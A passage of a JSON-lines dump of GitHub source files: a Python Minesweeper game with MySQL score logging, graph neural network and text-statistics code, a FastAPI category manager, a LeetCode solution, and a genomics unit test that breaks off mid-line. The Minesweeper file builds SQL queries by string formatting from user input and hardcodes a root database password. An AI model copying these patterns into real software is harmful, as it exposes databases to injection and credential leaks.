If the name is not recognized, then function\r\n will request email and insert this data into PLAYER_TBL\r\n '''\r\n global name\r\n \r\n\r\n # Connect to the local database\r\n db = sql.connect(\"localhost\", \"root\", \"Hog123er\", \"minesweeper\")\r\n\r\n # prepare a cursor object using cursor() method\r\n cursor = db.cursor()\r\n\r\n # Ask user for name\r\n name = input(\"Type in your name: \")\r\n\r\n # Identifying if the name the user typed in is already in the database\r\n query = \"SELECT * FROM PLAYER_TBL WHERE PLAYER_NAME LIKE ('%s')\" % name\r\n cursor.execute(query)\r\n result1 = cursor.fetchall()\r\n # The condition checks if nothing is returned, then the user has a unique name\r\n # Because user is unique, we will be requesting for the email addresss\r\n\r\n if (len(result1) == 0):\r\n email = input(\"Type in your email: \")\r\n\r\n # Inserting new unique name and email to table\r\n query2 = \"INSERT INTO PLAYER_TBL (PLAYER_NAME, PLAYER_EMAIL) VALUES ('%s', '%s')\" % (name, email)\r\n cursor.execute(query2)\r\n db.commit()\r\n\r\n # If our initial query statement did return a record back, that means the user typed in an existing name\r\n else:\r\n print(\"You are in our records!\")\r\n\r\n\r\n # query = \"INSERT INTO PLAYER_TBL (PLAYER_EMAIL, PLAYER_NAME) VALUES ('Raajesh@hotmail.com', 'Raajesh Arunachalam')\"\r\n query3 = \"SELECT * FROM PLAYER_TBL\"\r\n\r\n \r\n cursor.execute(query3)\r\n\r\n # disconnect from server\r\n db.close()\r\n\r\n # Test code below to make sure PLAYER_TBL is accurate\r\n result = cursor.fetchall()\r\n\r\n for r in result:\r\n print(r)\r\n\r\ndef end_game():\r\n '''\r\n Once game is complete, game statistics are written to database GAME_TBL, such as number of squares in the board, number\r\n of mines in the game, time taken from start to finish, and completion percentage\r\n '''\r\n global name\r\n\r\n # Connect to the local database\r\n db = sql.connect(\"localhost\", \"root\", \"Hog123er\", \"minesweeper\")\r\n\r\n # prepare a cursor object using cursor() method\r\n cursor = db.cursor()\r\n\r\n # Using the name provided by the user, to obtain the player_id associated with it\r\n # We do this so that we can use the player_id as a foreign key for the GAME_TBL table\r\n query = \"SELECT PLAYER_ID FROM PLAYER_TBL WHERE (PLAYER_NAME = '%s')\" % (name)\r\n cursor.execute(query)\r\n result = cursor.fetchall()\r\n player_id = result[0][0]\r\n \r\n\r\n # Populating after game statistics into GAME_TBL after the person has completed their game, whether they won or lost\r\n query2 = \"INSERT INTO GAME_TBL (PLAYER_ID,NUM_SQUARES,NUM_MINES,TIME,COMPLETION_PERC) VALUES (%d, %d, %d, %f, %f)\" \\\r\n % (player_id, total_square, num_bombs, end_time, num_open_square / (total_square-num_bombs) * 100)\r\n cursor.execute(query2)\r\n db.commit()\r\n\r\n #disconnect from the server\r\n db.close()\r\n\r\n\r\n\r\n# initial parameters\r\nname = ''\r\nnum_open_square = 0\r\nlost_flag = 0\r\nnum_bombs = 5\r\nM = []\r\nmax_rows = 5\r\nmax_rows = 5\r\n\r\n# To request user for personal information\r\nintro_screen()\r\n\r\n# Creates a max_rows X max_rows square matrix that is fully populated with Square instances\r\ntotal_square = max_rows * max_rows\r\nfor i in range(0, max_rows):\r\n M.append([])\r\n for j in range(0, max_rows):\r\n M[i].append(Square(0, 0, \"X\", 0))\r\n\r\n# Initiates where all the mines will be and adjusts the counter variables accordingly\r\ninitialize_array(num_bombs)\r\n\r\n# Starts the timer when the user first gets to the board\r\nstart_time = 
time.time()\r\n\r\n# Conditions it so that you will keep getting prompted until either you lose, or you win\r\nwhile (num_open_square < (max_rows*max_rows) - num_bombs):\r\n\r\n # This will print out the board. It will print out all the closed boxes and the boxes that are open with thier counter value\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n if M[i][j].open == \"X\":\r\n print(M[i][j].open, end=' ')\r\n else:\r\n print(M[i][j].counter, end=' ')\r\n \r\n \r\n print(\"\\n\")\r\n # request row and column information from user. We subtract one to make it more intuitive, since no counts from zero\r\n try:\r\n row = (int(input(\"Type in row: \")) - 1)\r\n column = (int(input(\"Type in column: \")) - 1)\r\n if 0 <= row < 5 and 0 <= column < 5:\r\n open_square(row, column)\r\n else:\r\n print(\"Out of bounds.\")\r\n except ValueError:\r\n print(\"Illogical value typed in. Please try again.\")\r\n\r\n # If lost_flag is 1, then it will reveal the cell with the bomb that you opened along with all the other cells you opened\r\n if lost_flag == 1:\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n if M[i][j].bomb == \"B\" and M[i][j].open == \"O\":\r\n print(M[i][j].bomb, end = ' ')\r\n elif M[i][j].open == \"X\":\r\n print(M[i][j].open, end=' ')\r\n else:\r\n print(M[i][j].counter, end=' ')\r\n # total time is calculated and printed out.\r\n print(\"\\n\")\r\n print(\"You lost!\")\r\n end_time = time.time() - start_time\r\n print(\"Total game time: %.2f\" % end_time)\r\n break\r\n\r\n# If the user opens up all the boxes, aside from the bombs, he wins\r\nif (num_open_square == (max_rows * max_rows) - num_bombs) and lost_flag == 0:\r\n print(\"You won!\")\r\n end_time = time.time() - start_time\r\n print(\"Total game time: %.2f\" % end_time)\r\n# Call function that writes game statistics to database\r\nend_game()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"arunach2/Minesweeper","sub_path":"Minesweeper.py","file_name":"Minesweeper.py","file_ext":"py","file_size_in_byte":9984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40507735472","text":"import torch\nfrom torch_geometric.nn import MessagePassing\nfrom torch_geometric.nn import global_add_pool, GENConv, DeepGCNLayer\nimport torch.nn.functional as F\nfrom torch.nn import ReLU\nfrom torch_geometric.nn.conv.gcn_conv import gcn_norm\nfrom ogb.graphproppred.mol_encoder import AtomEncoder, BondEncoder\n\n\ndef make_mask(batch, device):\n n = batch.shape[0]\n mask = torch.eq(batch.unsqueeze(1), batch.unsqueeze(0))\n mask = (torch.ones((n, n)) - torch.eye(n)).to(device) * mask\n count = torch.sum(mask)\n return mask, count\n\nclass Deepergcn_dagnn_dist(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5, \n JK=\"last\", aggr='softmax', norm='batch', \n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(Deepergcn_dagnn_dist, self).__init__()\n\n self.deepergcn_dagnn = DeeperDAGNN_node_Virtualnode(num_layers, emb_dim, drop_ratio, JK, aggr, norm)\n self.calc_dist = DistMax(emb_dim)\n\n def forward(self, batched_data, train=False):\n xs = self.deepergcn_dagnn(batched_data)\n mask_d_pred, mask, count = self.calc_dist(xs, batched_data.batch)\n return mask_d_pred, mask, count\n\n\nclass DistMax(torch.nn.Module):\n def __init__(self, emb_dim, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(DistMax, 
self).__init__()\n self.fc = torch.nn.Linear(in_features=emb_dim, out_features=1)\n self.device = device\n\n def forward(self, xs, batch, train=False):\n d_pred = self.fc(torch.max(xs.unsqueeze(0), xs.unsqueeze(1))).squeeze()\n mask, count = make_mask(batch, self.device)\n\n if train:\n mask_d_pred = d_pred * mask\n else:\n mask_d_pred = F.relu(d_pred * mask)\n return mask_d_pred, mask, count\n\n\nclass Deepergcn_dagnn_coords(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5,\n JK=\"last\", aggr='softmax', norm='batch',\n device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(Deepergcn_dagnn_coords, self).__init__()\n\n self.deepergcn_dagnn = DeeperDAGNN_node_Virtualnode(num_layers, emb_dim, drop_ratio, JK, aggr, norm)\n self.calc_dist = DistCoords(emb_dim)\n\n def forward(self, batched_data, train=False):\n xs = self.deepergcn_dagnn(batched_data)\n mask_d_pred, mask, count = self.calc_dist(xs, batched_data.batch)\n return mask_d_pred, mask, count\n\n\nclass DistCoords(torch.nn.Module):\n def __init__(self, emb_dim, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n super(DistCoords, self).__init__()\n self.fc = torch.nn.Linear(in_features=emb_dim, out_features=3)\n self.device = device\n\n def forward(self, xs, batch, train=False):\n xs = self.fc(xs)\n d_pred = torch.cdist(xs, xs)\n mask, count = make_mask(batch, self.device)\n\n if train:\n mask_d_pred = d_pred * mask\n else:\n mask_d_pred = F.relu(d_pred * mask)\n return mask_d_pred, mask, count\n\n\nclass DAGNN(MessagePassing):\n def __init__(self, K, emb_dim, normalize=True, add_self_loops=True):\n super(DAGNN, self).__init__()\n self.K = K\n self.normalize = normalize\n self.add_self_loops = add_self_loops\n\n self.proj = torch.nn.Linear(emb_dim, 1)\n\n self._cached_edge_index = None\n\n def forward(self, x, edge_index, edge_weight=None):\n if self.normalize:\n edge_index, norm = gcn_norm( # yapf: disable\n edge_index, edge_weight, x.size(self.node_dim), False,\n self.add_self_loops, dtype=x.dtype)\n\n preds = []\n preds.append(x)\n for k in range(self.K):\n x = self.propagate(edge_index, x=x, norm=norm)\n preds.append(x)\n\n pps = torch.stack(preds, dim=1)\n retain_score = self.proj(pps)\n retain_score = retain_score.squeeze()\n retain_score = torch.sigmoid(retain_score)\n retain_score = retain_score.unsqueeze(1)\n out = torch.matmul(retain_score, pps).squeeze()\n return out\n\n\n def message(self, x_j, norm):\n return norm.view(-1, 1) * x_j\n\n def __repr__(self):\n return '{}(K={})'.format(self.__class__.__name__, self.K)\n\n def reset_parameters(self):\n self.proj.reset_parameters()\n\n\nclass DeeperDAGNN_node_Virtualnode(torch.nn.Module):\n def __init__(self, num_layers, emb_dim, drop_ratio=0.5, JK=\"last\", aggr='softmax', norm='batch'):\n '''\n emb_dim (int): node embedding dimensionality\n num_layers (int): number of GNN message passing layers\n '''\n\n super(DeeperDAGNN_node_Virtualnode, self).__init__()\n self.num_layers = num_layers\n self.drop_ratio = drop_ratio\n self.JK = JK\n # self.input_encode_manner = input_encode_manner\n\n if self.num_layers < 2:\n raise ValueError(\"Number of GNN layers must be greater than 1.\")\n\n self.atom_encoder = AtomEncoder(emb_dim)\n self.bond_encoder = BondEncoder(emb_dim=emb_dim)\n\n ### set the initial virtual node embedding to 0.\n self.virtualnode_embedding = torch.nn.Embedding(1, emb_dim)\n torch.nn.init.constant_(self.virtualnode_embedding.weight.data, 0)\n\n ### List of MLPs to transform virtual node at every 
layer\n self.mlp_virtualnode_list = torch.nn.ModuleList()\n\n self.dagnn = DAGNN(5, emb_dim)\n\n ###List of GNNs\n self.layers = torch.nn.ModuleList()\n for i in range(1, num_layers + 1):\n conv = GENConv(emb_dim, emb_dim, aggr=aggr, t=1.0, learn_t=True, learn_p=True, num_layers=2, norm=norm)\n if norm==\"batch\":\n normalization = torch.nn.BatchNorm1d(emb_dim)\n elif norm==\"layer\":\n normalization = torch.nn.LayerNorm(emb_dim, elementwise_affine=True)\n else:\n print('Wrong normalization strategy!!!')\n act = ReLU(inplace=True)\n\n\n layer = DeepGCNLayer(conv, normalization, act, block='res+', dropout=0)\n self.layers.append(layer)\n\n for layer in range(num_layers - 1):\n if norm==\"batch\":\n self.mlp_virtualnode_list.append(torch.nn.Sequential(torch.nn.Linear(emb_dim, emb_dim), torch.nn.BatchNorm1d(emb_dim), torch.nn.ReLU(), \\\n torch.nn.Linear(emb_dim, emb_dim), torch.nn.BatchNorm1d(emb_dim), torch.nn.ReLU()))\n elif norm==\"layer\":\n self.mlp_virtualnode_list.append(torch.nn.Sequential(torch.nn.Linear(emb_dim, emb_dim), torch.nn.LayerNorm(emb_dim, elementwise_affine=True), torch.nn.ReLU(), \\\n torch.nn.Linear(emb_dim, emb_dim), torch.nn.LayerNorm(emb_dim, elementwise_affine=True), torch.nn.ReLU()))\n\n def forward(self, batched_data):\n x, edge_index, edge_attr, batch = batched_data.x, batched_data.edge_index, batched_data.edge_attr, batched_data.batch\n\n edge_attr = self.bond_encoder(edge_attr)\n h = self.atom_encoder(x)\n\n h_list = []\n\n virtualnode_embedding = self.virtualnode_embedding(torch.zeros(batch[-1].item() + 1).to(edge_index.dtype).to(edge_index.device))\n\n h = h + virtualnode_embedding[batch]\n h = self.layers[0].conv(h, edge_index, edge_attr)\n\n h_list.append(h)\n for i, layer in enumerate(self.layers[1:]):\n h = layer(h, edge_index, edge_attr)\n\n ### update the virtual nodes\n ### add message from graph nodes to virtual nodes\n virtualnode_embedding_temp = global_add_pool(h, batch) + virtualnode_embedding\n\n ### transform virtual nodes using MLP\n virtualnode_embedding = F.dropout(self.mlp_virtualnode_list[i](virtualnode_embedding_temp), self.drop_ratio, training = self.training)\n\n h = h + virtualnode_embedding[batch]\n h_list.append(h)\n\n h = self.layers[0].act(self.layers[0].norm(h))\n h = F.dropout(h, p=0, training=self.training)\n\n h_list.append(h)\n h = h + virtualnode_embedding[batch]\n\n h = self.dagnn(h, edge_index)\n h_list.append(h)\n\n ### Different implementations of Jk-concat\n if self.JK == \"last\":\n node_representation = h_list[-1]\n elif self.JK == \"sum\":\n node_representation = 0\n for layer in range(len(h_list)):\n node_representation += h_list[layer]\n\n return node_representation\n","repo_name":"divelab/MoleculeX","sub_path":"molx/model/deepergcn_dagnn.py","file_name":"deepergcn_dagnn.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"75"} +{"seq_id":"12612927824","text":"import numpy as np\nimport scipy.sparse as sp\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.preprocessing import normalize\n\n\ndef calculate_entropy(p, alpha):\n \"\"\"\n Generalized Jensen-Shannon Divergence\n ref: https://arxiv.org/abs/1706.08671\n \"\"\"\n if not sp.issparse(p):\n p = sp.csr_matrix(p.ravel())\n\n if alpha == 0:\n H = p.shape[1] - 1\n elif alpha == 1:\n H = - np.sum(p.data * np.log(p.data))\n elif alpha == 2:\n H = 1 - (p.data ** 2).sum()\n else:\n H = ((p.data ** alpha).sum() - 1)/ (1 - alpha)\n return H\n\n\ndef 
calculate_max_entropy(h1, h2, pi1=0.5, pi2=0.5, alpha=2):\n \"\"\"\n Maximum entropy\n h1 : entropy of probability distribution p1\n h2 : entropy of probability distribution p2\n \"\"\"\n if alpha == 1:\n d_max = - pi1 * np.log(pi1) - pi2 * np.log(pi2)\n else:\n d_max = (pi1 ** alpha - pi1) * h1 + \\\n (pi2 ** alpha - pi2) * h2 + \\\n (pi1 ** alpha + pi2 ** alpha - 1)/(1 - alpha)\n return d_max\n\n\ndef distance_language(p1, p2, alpha=2, norm=True):\n \"\"\"\n Distance between two articles using Jensen-Shannon Divergence\n with given alpha parameter\n \"\"\"\n h1 = calculate_entropy(p1, alpha)\n h2 = calculate_entropy(p2, alpha)\n h12 = calculate_entropy(0.5 * p1 + 0.5 * p2, alpha=alpha)\n d_lang = h12 - (0.5 * h1) - (0.5 * h2)\n if norm:\n d_max = calculate_max_entropy(h1, h2, pi1=0.5, pi2=0.5, alpha=alpha)\n d_lang = d_lang / d_max\n return d_lang\n\n\ndef distance_language_cosine(p1, p2):\n \"\"\"\n Distance between two articles using cosine distance\n \"\"\"\n d_lang = (1 - cosine_similarity(p1, p2)).ravel()[0]\n return d_lang\n\n\ndef calculate_hamming_dist(topic_text_1, topic_text_2):\n \"\"\"\n Calculate Hamming distance between two topics text e.g.\n\n Examples\n ========\n calculate_hamming_dist('D.01', 'F.02') >> 2\n calculate_hamming_dist('F.01', 'F.02') >> 1\n calculate_hamming_dist('F.02', 'F.02') >> 0\n \"\"\"\n topic_text_1 = topic_text_1.replace('Stroke', '').replace('Tauopathies,', '')\n topic_text_2 = topic_text_2.replace('Stroke', '').replace('Tauopathies,', '')\n if topic_text_1[-1] == '.':\n topic_text_1 = topic_text_1[:-1]\n if topic_text_2[-1] == '.':\n topic_text_2 = topic_text_2[:-1]\n topic1, subtopic1 = topic_text_1.split('.')\n topic2, subtopic2 = topic_text_2.split('.')\n if topic1 == topic2 and subtopic1 == subtopic2:\n return 0\n elif topic1 == topic2 and subtopic1 != subtopic2:\n return 1\n else:\n return 2\n","repo_name":"titipata/language-variability-neuro","sub_path":"code/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"14724658447","text":"#! /usr/bin/python3\n\nimport collections\nimport multiprocessing\nimport pagedb\nimport sys\nimport word_seg\nimport math\nimport time\n\n# Each multiprocess worker needs its own connection to the database.\n# The simplest way to accomplish this is with a global variable, which\n# is set up in the pool initializer callback, and used by the map\n# workers. 
(Each process has its own copy of the global.)\n\nDATABASE = None\ndef worker_init(dbname, runs):\n global DATABASE\n DATABASE = pagedb.PageDB(dbname, runs)\n\n# worker functions\ndef corpus_wide_statistics(lang, db):\n \"\"\"Compute corpus-wide frequency and raw document frequency per term,\n and count the number of documents.\"\"\"\n\n corpus_word_freq = collections.Counter()\n raw_doc_freq = collections.Counter()\n n_documents = 0\n\n for text in db.get_page_texts(where_clause=\"lang_code='{}'\"\n .format(lang)):\n\n n_documents += 1\n already_this_document = set()\n for word in word_seg.segment(lang, text.contents):\n corpus_word_freq[word] += 1\n if word not in already_this_document:\n raw_doc_freq[word] += 1\n already_this_document.add(word)\n\n idf = compute_idf(n_documents, raw_doc_freq)\n db.update_corpus_statistics(lang, n_documents,\n [('cwf', corpus_word_freq),\n ('rdf', raw_doc_freq),\n ('idf', idf)])\n\n return idf\n\ndef compute_idf(n_documents, raw_doc_freq):\n \"\"\"Compute inverse document frequencies:\n idf(t, D) = log |D|/|{d in D: t in d}|\n i.e. total number of documents over number of documents containing\n the term. Since this is within-corpus IDF we know by construction\n that the denominator will never be zero.\"\"\"\n\n log = math.log\n return { word: log(n_documents/doc_freq)\n for word, doc_freq in raw_doc_freq.items() }\n\ndef compute_tfidf(db, lang, text, idf):\n # This is baseline tf-idf: no corrections for document length or\n # anything like that.\n tf = collections.Counter()\n for word in word_seg.segment(lang, text.contents):\n tf[word] += 1\n\n for word in tf.keys():\n tf[word] *= idf[word]\n\n db.update_text_statistic('tfidf', text.origin, tf)\n\ndef compute_nfidf(db, lang, text, idf):\n # This is \"augmented normalized\" tf-idf: the term frequency within\n # each document is normalized by the maximum term frequency within\n # that document, so long documents cannot over-influence scoring\n # of the entire corpus.\n tf = collections.Counter()\n for word in word_seg.segment(lang, text.contents):\n tf[word] += 1\n\n try:\n max_tf = max(tf.values())\n except ValueError:\n max_tf = 1\n\n for word in tf.keys():\n tf[word] = (0.5 + (0.5 * tf[word])/max_tf) * idf[word]\n\n db.update_text_statistic('nfidf', text.origin, tf)\n\ndef process_language(lang):\n db = DATABASE\n\n idf = corpus_wide_statistics(lang, db)\n ndoc, idf = db.get_corpus_statistic('idf', lang)\n\n # Note: the entire get_page_texts() operation must be enclosed in a\n # single transaction; committing in the middle will invalidate the\n # server-side cursor it holds.\n with db:\n for text in db.get_page_texts(\n where_clause=\"lang_code='{}'\"\n .format(lang)):\n compute_tfidf(db, lang, text, idf)\n compute_nfidf(db, lang, text, idf)\n\n return lang\n\ndef prep_database(dbname, runs):\n db = pagedb.PageDB(dbname, runs)\n langs = db.prepare_text_statistic('tfidf')\n langs |= db.prepare_text_statistic('nfidf')\n return langs\n\ndef fmt_interval(interval):\n m, s = divmod(interval, 60)\n h, m = divmod(m, 60)\n return \"{}:{:>02}:{:>05.2f}\".format(int(h), int(m), s)\n\ndef main():\n dbname = sys.argv[1]\n runs = sys.argv[2:]\n lang_codes = prep_database(dbname, runs)\n\n pool = multiprocessing.Pool(initializer=worker_init,\n initargs=(dbname, runs))\n\n start = time.time()\n sys.stderr.write(\"{}: processing {} languages...\\n\"\n .format(fmt_interval(0), len(lang_codes)))\n for finished in pool.imap_unordered(process_language, lang_codes):\n sys.stderr.write(\"{}: 
{}\\n\".format(fmt_interval(time.time() - start),\n finished))\n\nmain()\n","repo_name":"zackw/tbbscraper","sub_path":"analysis/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"75"} +{"seq_id":"21153989712","text":"#\n\n#!FastApi\nfrom fastapi import FastAPI, Depends, Request\nfrom fastapi.exceptions import RequestValidationError, HTTPException\n\n#!Tortoise Orm\nfrom tortoise.contrib.fastapi import HTTPNotFoundError\nfrom tortoise.exceptions import DoesNotExist\n\n#!Database models\nfrom models.course import Category\nfrom schemas.category import CategoryOutSchema, CategoryUpdateSchema\nfrom schemas.base import Status\n\n#!Pydantic\nfrom pydantic import BaseModel\n\n#!Python modules and functions\nfrom typing import List\nfrom decouple import config\n\n#!Helpers methods\nfrom utils.helpers import generate_slug\n\n\n# *CategoryManager\nclass CategoryManager:\n # ? get_all_categories\n @staticmethod\n async def get_all_categories() -> CategoryOutSchema:\n return await CategoryOutSchema.from_queryset(Category.all())\n\n # ? get_category\n @staticmethod\n async def get_category(slug) -> CategoryOutSchema:\n return await CategoryOutSchema.from_queryset_single(Category.get(slug=slug))\n\n # ?create_category\n @staticmethod\n async def create_category(category) -> CategoryOutSchema:\n category_dict = category.dict(exclude_unset=True)\n category_obj = await Category.create(**category_dict)\n return await CategoryOutSchema.from_tortoise_orm(category_obj)\n\n # ?update_category\n @staticmethod\n async def update_category(slug, category) -> CategoryOutSchema:\n try:\n db_category = await CategoryOutSchema.from_queryset_single(\n Category.get(slug=slug)\n )\n except DoesNotExist:\n raise HTTPException(status_code=404, detail=f\"Category {slug} not found\")\n if db_category.id or db_category.slug:\n await Category.filter(slug=slug).update(\n **category.dict(exclude_unset=True), slug=generate_slug(category.name)\n )\n return await CategoryOutSchema.from_queryset_single(\n Category.get(slug=generate_slug(category.name))\n )\n return HTTPException(status_code=404, detail=f\"Category not found\")\n\n # ?delete_category\n @staticmethod\n async def delete_category(slug) -> Status:\n try:\n db_category = await CategoryOutSchema.from_queryset_single(\n Category.get(slug=slug)\n )\n except DoesNotExist:\n raise HTTPException(status_code=404, detail=f\"Category {slug} not found\")\n\n if db_category.id or db_category.slug:\n deleted_category = await Category.filter(slug=slug).delete()\n if not deleted_category:\n raise HTTPException(\n status_code=404, detail=f\"Unable to delete category\"\n )\n return Status(message=f\"Deleted course {slug}\")\n return HTTPException(status_code=404, detail=f\"Category not found\")\n\n # ?delete_all_categories\n @staticmethod\n async def delete_all_categories() -> Status:\n all_deleted_categories = await Category.all().delete()\n if not all_deleted_categories:\n raise HTTPException(\n status_code=404, detail=f\"Your database model not exists category data\"\n )\n return Status(message=f\"All categories deleted successfully\")\n","repo_name":"riadelimemmedov/CourseMarketPlaceWeb3-Next.Js-FastAPI","sub_path":"backend/managers/course/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34412459021","text":"class Solution:\n def 
computeArea(self, ax1: int, ay1: int, ax2: int, ay2: int, bx1: int, by1: int, bx2: int, by2: int) -> int:\n area_1 = (ax2 - ax1) * (ay2 - ay1)\n area_2 = (bx2 - bx1) * (by2 - by1)\n\n overlap_width = min(ax2, bx2) - max(bx1, ax1)\n overlap_height = min(ay2, by2) - max(ay1, by1)\n if overlap_width > 0 and overlap_height > 0:\n return area_1 + area_2 - (overlap_width * overlap_height)\n else:\n return area_1 + area_2","repo_name":"s0lut1on/leetcode","sub_path":"rectangle_area.py","file_name":"rectangle_area.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73419031283","text":"#!/usr/bin/env python\n\nimport unittest\nfrom mock import Mock, PropertyMock\nfrom src.cds import CDS\n\nclass TestCDS(unittest.TestCase):\n\n def setUp(self):\n self.test_indices1 = [3734, 4034]\n self.extra_indices = [[4092, 4332], [4399, 5185], [5249, 6565], [6630, 7436]]\n test_identifier1 = 8\n self.extra_identifiers = [9, 10, 11, 12]\n self.test_phase1 = 0\n self.extra_phases = [2, 1, 0, 0]\n test_parent_id1 = 2\n self.test_cds0 = CDS(identifier=test_identifier1, indices=self.test_indices1, score=None, phase=self.test_phase1, strand='-', parent_id=test_parent_id1)\n self.test_cds1 = CDS(identifier=test_identifier1, indices=self.test_indices1, score=None, phase=self.test_phase1, strand='+', parent_id=test_parent_id1)\n for ind_pair in self.extra_indices:\n self.test_cds1.add_indices(ind_pair)\n for ident in self.extra_identifiers:\n self.test_cds1.add_identifier(ident)\n for phase in self.extra_phases:\n self.test_cds1.add_phase(phase)\n\n def test_constructor(self):\n self.assertEquals('-', self.test_cds0.strand)\n\n def test_get_start_indices_pos_strand(self):\n expected = [3734, 3736]\n self.assertEquals(expected, self.test_cds1.get_start_indices('+'))\n\n def test_get_start_indices_neg_strand(self):\n expected = [4032, 4034]\n self.assertEquals(expected, self.test_cds1.get_start_indices('-'))\n\n def test_get_stop_indices_pos_strand(self):\n expected = [7434, 7436]\n self.assertEquals(expected, self.test_cds1.get_stop_indices('+'))\n\n def test_get_stop_indices_neg_strand(self):\n expected = [6630, 6632]\n self.assertEquals(expected, self.test_cds1.get_stop_indices('-'))\n\n def test_extract_sequence_pos_strand(self):\n seq_object = Mock()\n seq_object.get_subseq.return_value = 'GATTACA'\n strand = '+'\n seq = self.test_cds1.extract_sequence(seq_object, strand)\n expected = 'GATTACAGATTACAGATTACAGATTACAGATTACA'\n self.assertEquals(expected, seq)\n\n def test_extract_sequence_neg_strand(self):\n seq_object = Mock()\n seq_object.get_subseq.return_value = 'GATTACA'\n strand = '-'\n result = self.test_cds1.extract_sequence(seq_object, strand)\n expected = 'TGTAATCTGTAATCTGTAATCTGTAATCTGTAATC'\n self.assertEquals(expected, result)\n\n def test_cds_constructor(self):\n self.assertEquals('CDS', self.test_cds0.__class__.__name__)\n # should also be able to construct w/o all the params...\n empty_cds = CDS()\n self.assertEquals('CDS', empty_cds.feature_type) \n\n def test_add_indices(self):\n for ind_pair in self.extra_indices:\n self.test_cds0.add_indices(ind_pair)\n self.assertEquals([4399, 5185], self.test_cds0.indices[2])\n\n def test_add_identifier(self):\n for ident in self.extra_identifiers:\n self.test_cds0.add_identifier(ident)\n self.assertEquals(5, len(self.test_cds0.identifier))\n\n def test_add_phase(self):\n for phase in self.extra_phases:\n self.test_cds0.add_phase(phase)\n self.assertEquals(5, 
len(self.test_cds0.phase))\n self.assertEquals(1, self.test_cds0.phase[2])\n\n def test_sort_attributes(self):\n cds = CDS()\n cds.indices = [[25, 30], [5, 10]] # out of order!\n cds.identifier = [\"cds2\", \"cds1\"]\n cds.phase = [1, 0]\n self.assertEquals(\"cds1\", cds.identifier[1])\n self.assertEquals([25, 30], cds.indices[0])\n self.assertEquals(1, cds.phase[0])\n cds.sort_attributes()\n self.assertEquals(\"cds1\", cds.identifier[0])\n self.assertEquals([5, 10], cds.indices[0])\n self.assertEquals(0, cds.phase[0])\n\n def test_length(self):\n self.assertEquals(3453, self.test_cds1.length())\n\n def test_adjust_indices(self):\n self.test_cds1.adjust_indices(-5)\n self.assertEquals(3729, self.test_cds1.indices[0][0])\n # (adjust them back so future test don't get confused :)\n self.test_cds1.adjust_indices(5)\n self.assertEquals(5185, self.test_cds1.indices[2][1])\n\n def test_to_gff(self):\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=8;Parent=2;foo=dog\\n\"\n expected2 = \"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=9;Parent=2;foo=dog\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=10;Parent=2;foo=dog\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=11;Parent=2;foo=dog\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=12;Parent=2;foo=dog\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n self.test_cds1.add_annotation('foo','dog') # Make sure our annotations are working\n actual = self.test_cds1.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n # what if identifier, parent_id are strings? does it matter?\n test_cds2 = CDS(identifier='foo1', indices=self.test_indices1, score=None, strand='+', phase=self.test_phase1, parent_id='bar7')\n extra_identifiers2 = ['foo2', 'foo3', 'foo4', 'foo5']\n for ind_pair in self.extra_indices:\n test_cds2.add_indices(ind_pair)\n for ident in extra_identifiers2:\n test_cds2.add_identifier(ident)\n for phase in self.extra_phases:\n test_cds2.add_phase(phase)\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=foo1;Parent=bar7\\n\"\n expected2 = \"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=foo2;Parent=bar7\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=foo3;Parent=bar7\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=foo4;Parent=bar7\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=foo5;Parent=bar7\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n actual = test_cds2.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=foo1;Parent=bar7\\n\"\n expected2 = 